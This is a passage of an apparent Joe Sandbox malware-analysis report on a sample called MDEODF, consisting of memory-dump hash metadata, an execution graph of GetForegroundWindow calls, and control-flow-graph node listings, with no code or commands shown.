                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 747b4096c88f580c6775333357478d3754ebf857f9eb59c6b5f1225c9eec2d00
                                    • Instruction ID: 5df4f5401b6ed9cf8916e3e8d46c75ed9205f36b9b31619d68b24a1bbcc0c417
                                    • Opcode Fuzzy Hash: 747b4096c88f580c6775333357478d3754ebf857f9eb59c6b5f1225c9eec2d00
                                    • Instruction Fuzzy Hash: 4E3189B5D002589FCF10CFA9D984AEEFBB5BB49310F20A42AE814B7310D735A955CF64
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ff7747624101885d408bb4faf8fcd5f15fac2413051b962610a9eba1508ac640
                                    • Instruction ID: 4ade035f3e3825388a6e5e684662a50efa1c10ec0cfb219040199d525d94195e
                                    • Opcode Fuzzy Hash: ff7747624101885d408bb4faf8fcd5f15fac2413051b962610a9eba1508ac640
                                    • Instruction Fuzzy Hash: F6B1B574E002598FDB14DFAAC981AADFBF2BF88300F64C16AD419AB355DB34A941CF51
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 31aa863f62a4cc8100632f71eeb4d7cd7c9d54eef304ac6d30a8ef2846111e7c
                                    • Instruction ID: 75962df9f5e976700244529875b67e696926f24813807a5b73f4e60435505dcf
                                    • Opcode Fuzzy Hash: 31aa863f62a4cc8100632f71eeb4d7cd7c9d54eef304ac6d30a8ef2846111e7c
                                    • Instruction Fuzzy Hash: D391C574E102598FDB58CFAAC984A9DBBF2BF88300F64C169D409AB355DB34AD42CF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dp
                                    • API String ID: 0-2261812057
                                    • Opcode ID: c320f6e425ef58df9f8290de2ade55fadc5e571fa6164fa59806221568ffc758
                                    • Instruction ID: fcf66e8242a606d0adb702e79d47b1f7af6b5b332dad8305f781fbd76721e677
                                    • Opcode Fuzzy Hash: c320f6e425ef58df9f8290de2ade55fadc5e571fa6164fa59806221568ffc758
                                    • Instruction Fuzzy Hash: 2E829074A10229DFCB24DFA8D984BDDBBB1BF49304F1085AAD409AB365D770AE85CF50
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 866c2abc0cf9d9d205240c9b1be84bd2908d7fd6b101995fda3e1aeb1acdcd85
                                    • Instruction ID: 6b34def7cc336d5a528b97bde41d00ef968a0db99287d9607b918c345be855ff
                                    • Opcode Fuzzy Hash: 866c2abc0cf9d9d205240c9b1be84bd2908d7fd6b101995fda3e1aeb1acdcd85
                                    • Instruction Fuzzy Hash: 76213C71E0024E9FCF05DFA8D450ADDBBB1EF49310F8581A6D464BB661D730A94ACF94
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27076f47249d5a7b29c62198880757e7df81d27f29efee02ab1cf4183eda5eb1
                                    • Instruction ID: 3c732b02b3e8857f8fbcfb0a34ada3e82227add011807390b35597933d37b311
                                    • Opcode Fuzzy Hash: 27076f47249d5a7b29c62198880757e7df81d27f29efee02ab1cf4183eda5eb1
                                    • Instruction Fuzzy Hash: 01212F70A00349DFC742EFB8E985B4D7FF1EF45308F4049A5D044AF269DB74AA498B91
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f9e7cc8340aac551f67e28946531868748866c47b05930be1fd2166cce4fa6e
                                    • Instruction ID: 33b593b623517d66a05bdadc3de5ac4b27e30f8894ada7a6d51a7f29e227c7d2
                                    • Opcode Fuzzy Hash: 0f9e7cc8340aac551f67e28946531868748866c47b05930be1fd2166cce4fa6e
                                    • Instruction Fuzzy Hash: C6110D70E10309EFCB45EFB8E689B4D7FF1EB44308F508965D044AF669DB74AA498B81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3146a1b190b7b3a5efde34a2da0b5317b78635eb2ae0136c05fc92d5530fc149
                                    • Instruction ID: b26d67d93aa17a99e01565cdd83bbc514fd98de81f180909cbe6f6a2ef8bc876
                                    • Opcode Fuzzy Hash: 3146a1b190b7b3a5efde34a2da0b5317b78635eb2ae0136c05fc92d5530fc149
                                    • Instruction Fuzzy Hash: D5F06970C182099BDF00CFA6D4543EEBBF4EB4A300F00506AD410B7240D7785929DF90
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3d9d50e45b96420fcb86b016c73dcdb730e944ccc9d24c396c9021a367598da9
                                    • Instruction ID: 575d8b698d093b84a66280176d293eb775d07283fa3863f0a8d350963db42cb6
                                    • Opcode Fuzzy Hash: 3d9d50e45b96420fcb86b016c73dcdb730e944ccc9d24c396c9021a367598da9
                                    • Instruction Fuzzy Hash: 6001B670C05349DFCB05DFA8D894A9DBBB4FF46300F1445EAD455E72A5EB30AA54CB81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0be4d4671681b2eeb55ee69a1a34ef9b5a3e68427c79f9aa53e477a20f325104
                                    • Instruction ID: 47ab3d6c50d0fef02b9fd14323c8e23c849cc46e303c31fbbebcfd05f7dc94a0
                                    • Opcode Fuzzy Hash: 0be4d4671681b2eeb55ee69a1a34ef9b5a3e68427c79f9aa53e477a20f325104
                                    • Instruction Fuzzy Hash: 5CF0B274C0020EDFCB44EFA8D9856AEBBB4FB45300F1046AAC415A7360EB70AA84CB80

                                    Execution Graph

                                    Execution Coverage:21.6%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:17
                                    Total number of Limit Nodes:0
                                    execution_graph 6744 30fd38 6745 30fd5c 6744->6745 6746 30fd7d 6745->6746 6749 48001e 6745->6749 6754 480040 6745->6754 6750 480026 6749->6750 6759 4801c8 6750->6759 6762 4801d0 6750->6762 6751 48009c 6751->6746 6755 48005c 6754->6755 6757 4801c8 GetForegroundWindow 6755->6757 6758 4801d0 GetForegroundWindow 6755->6758 6756 48009c 6756->6746 6757->6756 6758->6756 6760 480212 GetForegroundWindow 6759->6760 6761 480251 6760->6761 6761->6751 6763 480212 GetForegroundWindow 6762->6763 6764 480251 6763->6764 6764->6751

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 59 300b60-300b8b 60 300b92-300bef 59->60 61 300b8d 59->61 62 300bf1 60->62 63 300bf8-300c19 60->63 61->60 62->63 64 300c01-3010ea 62->64 65 300c13-301766 62->65 66 300c07-3011f0 62->66 67 300bfb-300f7c 62->67 68 300c0d-300c0e 62->68 220 300c1a call 301870 63->220 221 300c1a call 301880 63->221 78 3010ed-3010fe 64->78 81 301769-3017a2 65->81 80 3011f3-301202 66->80 79 300f7f-300f9c 67->79 73 301216-301220 68->73 76 301222 73->76 77 301229-30122a 73->77 75 300c20-300c2e 82 300c30-300c59 75->82 83 300c5a-300c79 75->83 84 301232-301477 76->84 85 301238-3015d4 76->85 86 30122c-30122d 76->86 77->86 87 30123e-301259 77->87 98 301203 78->98 101 300fa2-300fc8 79->101 102 301204-301205 79->102 80->98 120 3017a4-3017af 81->120 82->83 104 300e64-300ebf call 30016c 83->104 105 300c7f-300d03 83->105 103 30147a-301513 call 3056c0 84->103 96 3015d7-301644 85->96 88 301324-30134d 86->88 108 301264-3012cd 87->108 99 301350-3013ab 88->99 122 301646-301647 96->122 123 30164c-301662 96->123 98->102 217 3013b1 call 302c25 99->217 218 3013b1 call 302c98 99->218 118 300fca-300fdc 101->118 119 300fdd 101->119 102->73 106 3017b0-3017be 102->106 178 301519-301554 103->178 144 300ec1-30182f 104->144 145 300ec8-300f02 104->145 167 300e45-300e63 105->167 168 300d09-300d71 105->168 108->99 163 3012d3-30131f 108->163 118->119 223 300fdd call 301870 119->223 224 300fdd call 301880 119->224 120->106 122->120 128 301664-301670 123->128 129 30168c 123->129 127 300fe3-300ff7 134 301103-301170 127->134 135 300ffd-301029 call 301f08 127->135 136 301672-301678 128->136 137 30167a-301680 128->137 139 301692-3016e6 129->139 134->80 190 301176-3011c2 134->190 170 30102f-30106a 135->170 143 30168a 136->143 137->143 139->81 184 3016ec-301738 139->184 143->139 166 301830-301837 144->166 145->79 182 300f04-300f4e 145->182 151 3013b7-3013f7 151->103 175 3013fd-301449 151->175 163->88 163->166 167->104 205 300d73-300d89 168->205 206 300d8a-300dd9 168->206 170->78 194 301070-3010bc 170->194 175->166 178->96 200 30155a-3015a6 178->200 182->166 184->166 190->166 194->166 200->166 205->206 212 300de4-300e42 206->212 212->167 217->151 218->151 220->75 221->75 223->127 224->127
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (e'$@T'$@T'$dp
                                    • API String ID: 0-2762516323
                                    • Opcode ID: 71172a2d56ddbc8bc3e5e1def0abc33f4a3580858ee30d3fc6dbf69e833c110d
                                    • Instruction ID: 5f0160351a1b259e1d4467b1f8f91a8b6c6db84afb3ed2c5acacbd263f396e7c
                                    • Opcode Fuzzy Hash: 71172a2d56ddbc8bc3e5e1def0abc33f4a3580858ee30d3fc6dbf69e833c110d
                                    • Instruction Fuzzy Hash: 8F82B074901229CFCB25DFA8D894BDDBBB5BF49300F1085AAD409AB365DB30AE85CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 486 30e208-30e230 487 30e232 486->487 488 30e237-30e260 486->488 487->488 491 30e262-30e269 488->491 492 30e26e-30e26f 488->492 495 30e271-30e272 491->495 496 30e26b-30e26c 491->496 494 30e280-30e287 492->494 497 30e290-30e291 494->497 498 30e289 494->498 499 30e277-30e27d 495->499 504 30e7f3-30e828 495->504 496->499 500 30e293-30e294 497->500 505 30e2ab-30e2c6 497->505 498->500 501 30e2a5-30e6d9 498->501 502 30e299-30e496 498->502 503 30e29f-30e5dd 498->503 499->494 506 30e38c-30e3ac 500->506 513 30e6dc-30e6f2 501->513 512 30e499-30e514 502->512 511 30e5e0-30e614 503->511 517 30e86f-30e884 504->517 518 30e2d0-30e347 505->518 514 30e3af-30e3f7 call 302c98 506->514 530 30e616 511->530 531 30e61b-30e63f call 30d820 511->531 540 30e516 512->540 541 30e51b-30e543 call 30d820 512->541 513->517 528 30e3fc-30e430 514->528 527 30e88c 517->527 518->514 554 30e349-30e387 518->554 529 30e88d-30e894 527->529 528->512 542 30e432-30e471 call 304ca8 528->542 530->531 543 30e644-30e673 531->543 540->541 553 30e548-30e577 541->553 542->529 543->513 555 30e675-30e6b4 call 304ee0 543->555 553->511 563 30e579-30e5b8 call 304ee0 553->563 554->506 554->529 555->529 563->529
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @T'$@T'
                                    • API String ID: 0-428772192
                                    • Opcode ID: 9686809002612c25f97e8de9ba4a186a916e6516471fbfbb4ed6beb068e06586
                                    • Instruction ID: 6143317123d3ae7f0408ae6f82b446362c4f8f2d82ca016ee777970c90e63e45
                                    • Opcode Fuzzy Hash: 9686809002612c25f97e8de9ba4a186a916e6516471fbfbb4ed6beb068e06586
                                    • Instruction Fuzzy Hash: C512B474E05219CFDB15DFA8C880ADDBBF6BF49310F2186A9D409AB366D730A985CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 567 30e1c0-30e1c1 568 30e201 567->568 569 30e1c3-30e1de 567->569 570 30e241-30e260 568->570 571 30e203-30e230 568->571 572 30e1e0 569->572 573 30e1e5-30e1f2 569->573 574 30e262-30e269 570->574 575 30e26e-30e26f 570->575 576 30e232 571->576 577 30e237-30e23e 571->577 572->573 582 30e271-30e272 574->582 583 30e26b-30e26c 574->583 580 30e280-30e287 575->580 576->577 577->570 584 30e290-30e291 580->584 585 30e289 580->585 586 30e277-30e27d 582->586 591 30e7f3-30e828 582->591 583->586 587 30e293-30e294 584->587 592 30e2ab-30e2ac 584->592 585->587 588 30e2a5-30e6d9 585->588 589 30e299-30e496 585->589 590 30e29f-30e5dd 585->590 586->580 593 30e38c-30e3ac 587->593 600 30e6dc-30e6f2 588->600 599 30e499-30e514 589->599 598 30e5e0-30e614 590->598 604 30e86f-30e884 591->604 602 30e2b6-30e2c6 592->602 601 30e3af 593->601 617 30e616 598->617 618 30e61b-30e62b 598->618 627 30e516 599->627 628 30e51b-30e52d 599->628 600->604 609 30e3b7-30e3f7 call 302c98 601->609 605 30e2d0-30e347 602->605 614 30e88c 604->614 605->601 641 30e349-30e387 605->641 615 30e3fc-30e430 609->615 616 30e88d-30e894 614->616 615->599 629 30e432-30e471 call 304ca8 615->629 617->618 622 30e633-30e63f call 30d820 618->622 630 30e644-30e673 622->630 627->628 634 30e535-30e543 call 30d820 628->634 629->616 630->600 642 30e675-30e6b4 call 304ee0 630->642 640 30e548-30e577 634->640 640->598 650 30e579-30e5b8 call 304ee0 640->650 641->593 641->616 642->616 650->616
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @T'$@T'
                                    • API String ID: 0-428772192
                                    • Opcode ID: 3856e4b51a74cad8ac4202dd13f053179fd65d7921903828a11c0beaba2e79b9
                                    • Instruction ID: 04131f98f095c45c7063579dd767095375bfbc7bffdc97f01f90419a7cd63ec9
                                    • Opcode Fuzzy Hash: 3856e4b51a74cad8ac4202dd13f053179fd65d7921903828a11c0beaba2e79b9
                                    • Instruction Fuzzy Hash: 16F1D674E05218CFDB15CFA8C890ADDBBF6BF49310F258699D409AB3A6D730A985CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 654 30e1f8-30e1fd 656 30e23d-30e23e 654->656 657 30e1ff-30e201 654->657 659 30e241-30e260 656->659 657->659 662 30e203-30e230 657->662 660 30e262-30e269 659->660 661 30e26e-30e26f 659->661 667 30e271-30e272 660->667 668 30e26b-30e26c 660->668 664 30e280-30e287 661->664 665 30e232 662->665 666 30e237-30e23c 662->666 669 30e290-30e291 664->669 670 30e289 664->670 665->666 666->656 671 30e277-30e27d 667->671 676 30e7f3-30e828 667->676 668->671 672 30e293-30e294 669->672 677 30e2ab-30e2ac 669->677 670->672 673 30e2a5-30e6d9 670->673 674 30e299-30e496 670->674 675 30e29f-30e5dd 670->675 671->664 678 30e38c-30e3ac 672->678 685 30e6dc-30e6f2 673->685 684 30e499-30e514 674->684 683 30e5e0-30e614 675->683 689 30e86f-30e884 676->689 687 30e2b6-30e2c6 677->687 686 30e3af 678->686 702 30e616 683->702 703 30e61b-30e62b 683->703 712 30e516 684->712 713 30e51b-30e52d 684->713 685->689 694 30e3b7-30e3f7 call 302c98 686->694 690 30e2d0-30e347 687->690 699 30e88c 689->699 690->686 726 30e349-30e387 690->726 700 30e3fc-30e430 694->700 701 30e88d-30e894 699->701 700->684 714 30e432-30e471 call 304ca8 700->714 702->703 707 30e633-30e63f call 30d820 703->707 715 30e644-30e673 707->715 712->713 719 30e535-30e543 call 30d820 713->719 714->701 715->685 727 30e675-30e6b4 call 304ee0 715->727 725 30e548-30e577 719->725 725->683 735 30e579-30e5b8 call 304ee0 725->735 726->678 726->701 727->701 735->701
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @T'$@T'
                                    • API String ID: 0-428772192
                                    • Opcode ID: b6232c6508300a54e07bbd1604e98addfde64830b6a0c4212c6071a2f5adad6f
                                    • Instruction ID: af1a6cf83974fe6fd79a46a9dcf3caecdb44e5f78c2a74bdb5d62a4bcb3d08f3
                                    • Opcode Fuzzy Hash: b6232c6508300a54e07bbd1604e98addfde64830b6a0c4212c6071a2f5adad6f
                                    • Instruction Fuzzy Hash: 63E1C674E05218CFDB15CFA8C890ADDBBF6BF49310F258699D409AB3A6D730A985CF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XP'
                                    • API String ID: 0-2187284005
                                    • Opcode ID: f6b32ab0f11431e56cfb6efdc78920b19f22cd3851d830065f20d4f52cd5fd4a
                                    • Instruction ID: fd07918d2fa7465c4d22a7ea117d9697b10239af81fe5c39160cdf15d6821bbf
                                    • Opcode Fuzzy Hash: f6b32ab0f11431e56cfb6efdc78920b19f22cd3851d830065f20d4f52cd5fd4a
                                    • Instruction Fuzzy Hash: 5D629D74A01229CFCB25CF69C884BD9BBB5BF4A300F5082E9D449AB365D730AE85CF41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (p
                                    • API String ID: 0-4175582459
                                    • Opcode ID: 42b4184daa047c527d03abce8359ddace16cca44d91fcbfb3b2806f71326b74b
                                    • Instruction ID: 9f3060911d8481617f77529e3387c598d195f90276dc85b3d7ef7ee1322846c4
                                    • Opcode Fuzzy Hash: 42b4184daa047c527d03abce8359ddace16cca44d91fcbfb3b2806f71326b74b
                                    • Instruction Fuzzy Hash: 15E11674A01208CFDB19DFA8C594A9EBBF6FF89300F218569D405AB3A5DB30AD46CF50
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c8d0188e45f359daa6bc5d399983de1ec1be4b00965b9ebbf7dffc1b9a36e07b
                                    • Instruction ID: 66b63b35afeac7dedd76e8fee6a986c66bd0f5fc8c6fc43ba3539bbb3bdffdcf
                                    • Opcode Fuzzy Hash: c8d0188e45f359daa6bc5d399983de1ec1be4b00965b9ebbf7dffc1b9a36e07b
                                    • Instruction Fuzzy Hash: D602F374D11219CFDB25CFA9C891B9DBBB1BB49300F1092AAD409B7290EB749E85CF54
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 119dc1de6e3f91ee6eb96ee4bbfaa89ae0ad82b469e04b1d183c5c413bd45ed4
                                    • Instruction ID: 259ffc02203da515abcc6faf20c9a13fe30762c46690f94f8a958493a021aab0
                                    • Opcode Fuzzy Hash: 119dc1de6e3f91ee6eb96ee4bbfaa89ae0ad82b469e04b1d183c5c413bd45ed4
                                    • Instruction Fuzzy Hash: ED02D274E05219CFDB25CFA8C494ADDBBF1BF49310F6086A9D409AB3A6D730A985CF50
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 26a90477b68ed8f2e708478904f88daeb18e2479257c703dbd7031f500d4fcb3
                                    • Instruction ID: ae8e054d022addc25133530f6a73cbdc699af0d8d6faf0e1a6e993ab75573cc8
                                    • Opcode Fuzzy Hash: 26a90477b68ed8f2e708478904f88daeb18e2479257c703dbd7031f500d4fcb3
                                    • Instruction Fuzzy Hash: C5F1D374D01219CFDB25CFA8C995B9DBBF2BF49300F1081AAD409A7290EB749E85CF55
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c87afdefa2a336f9993c05ed29b811639c8267d4932b054584a71693b111dbbd
                                    • Instruction ID: 8c8ab83d1f20d23c4447c1066d93586da32efbe6de9e923527cd1dbeb62ff2f4
                                    • Opcode Fuzzy Hash: c87afdefa2a336f9993c05ed29b811639c8267d4932b054584a71693b111dbbd
                                    • Instruction Fuzzy Hash: 1302AF74E01219CFCB25CFAAC594ADDBBF5BF89300F248269D409AB766D730AA45CF50
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4fc3359171338909795ecaeb4dd5427a0d81820e0001ec25877cb9f0d4aa869
                                    • Instruction ID: 29ea51cb21130e4ee2426fd99e8e2272334b3edf02891456333f5015446e474d
                                    • Opcode Fuzzy Hash: a4fc3359171338909795ecaeb4dd5427a0d81820e0001ec25877cb9f0d4aa869
                                    • Instruction Fuzzy Hash: F0D18174E013188FDB15DFA9C984A9DBBF2BF89300F658695D408AB355DB30AE85CF90
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 931134e61fec664e3f0e6fe16117924a3a24bea96f9c50259f3b4ed1cddc37d3
                                    • Instruction ID: 4ac4d3decbc62b6246c549677be261223bfd54e96c06635db2b8de3c53e25b9f
                                    • Opcode Fuzzy Hash: 931134e61fec664e3f0e6fe16117924a3a24bea96f9c50259f3b4ed1cddc37d3
                                    • Instruction Fuzzy Hash: 12B18E75E00319CFCB05CFA9C594ADDBBF6BF89310F2591A9E409AB265D730AA85CF40
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72563367ee88c18297b83ba9e46faa2890785d3d672a83ab7a1a84a41d996e80
                                    • Instruction ID: 59aa8a3ad9024268e58a0a405f489e1aa7e65d939e5ff0cbcf33ab20287fbac4
                                    • Opcode Fuzzy Hash: 72563367ee88c18297b83ba9e46faa2890785d3d672a83ab7a1a84a41d996e80
                                    • Instruction Fuzzy Hash: 88410475E012199FDB05DFAAC895AEEFBF6BF88300F14806AD404B7295DB345A46CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 225 30dc00-30dc28 226 30dc2a 225->226 227 30dc2f-30dc5b 225->227 226->227 228 30dc60-30dc61 227->228 229 30dc5d-30dc63 227->229 231 30dc64-30dc6b 228->231 229->231 232 30dc74-30dc94 231->232 233 30dc6d 231->233 241 30dc96 232->241 242 30dc9b-30dcaf 232->242 233->232 234 30dc83-30dfb1 233->234 235 30dc77-30ddb1 233->235 236 30dc7d-30dedf 233->236 244 30dfb4-30dfbf 234->244 247 30ddb4-30de37 235->247 243 30dee2-30deed 236->243 241->242 245 30dcb1 242->245 246 30dcb6-30dd19 call 30e0cd 242->246 252 30dfee-30e058 243->252 244->252 245->246 257 30dd1f-30dd4d 246->257 266 30def2-30df09 247->266 267 30de3d-30de4a call 30ea80 247->267 256 30e089-30e09e 252->256 262 30e09f-30e0a6 256->262 257->247 265 30dd4f-30dd8c call 305000 257->265 265->262 268 30dfc1-30dfd6 266->268 269 30df0f-30df19 266->269 273 30de50-30de79 267->273 271 30dfd8-30dfd9 268->271 272 30dfde-30dfed 268->272 290 30df1c call 30f408 269->290 291 30df1c call 30f338 269->291 292 30df1c call 30f37a 269->292 271->256 272->252 273->243 282 30de7b-30deba call 301dd8 273->282 275 30df22-30df4b 275->244 283 30df4d-30df8c call 301dd8 275->283 282->262 283->262 290->275 291->275 292->275
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (e'$@T'$@T'
                                    • API String ID: 0-2136524690
                                    • Opcode ID: e7af4575023be8e6c11388b1af60a5c34f9a7c849f79ce63ea0b6ad9b71ec150
                                    • Instruction ID: 0df870df9be11c58d73fc76c58754ef4ac11a975a9cb75c495a9353952b3483d
                                    • Opcode Fuzzy Hash: e7af4575023be8e6c11388b1af60a5c34f9a7c849f79ce63ea0b6ad9b71ec150
                                    • Instruction Fuzzy Hash: 87E1AE74A01319CFCB05CFA9C898ADDBBF6BF4A310F148569E409AB3A6D770A945CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 295 305240-305268 296 30526a 295->296 297 30526f-3052a2 295->297 296->297 298 3052a4-3052bf 297->298 299 3052a7-3052a8 297->299 301 305313-305318 298->301 302 3052c1-305308 298->302 299->301 303 30531a-3053a5 call 306371 301->303 304 30531d-3055e0 301->304 302->301 320 3053c1-3053ea 303->320 321 3053a7-3053c0 303->321 308 3055e3-305651 304->308 316 305659 308->316 317 30565a-305661 316->317 324 3053f1-305419 320->324 325 3053ec 320->325 321->320 327 305476-305544 call 306de8 324->327 328 30541b-305475 324->328 325->324 339 30554c-30557b 327->339 328->327 339->308 342 30557d-3055bb 339->342 342->317
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
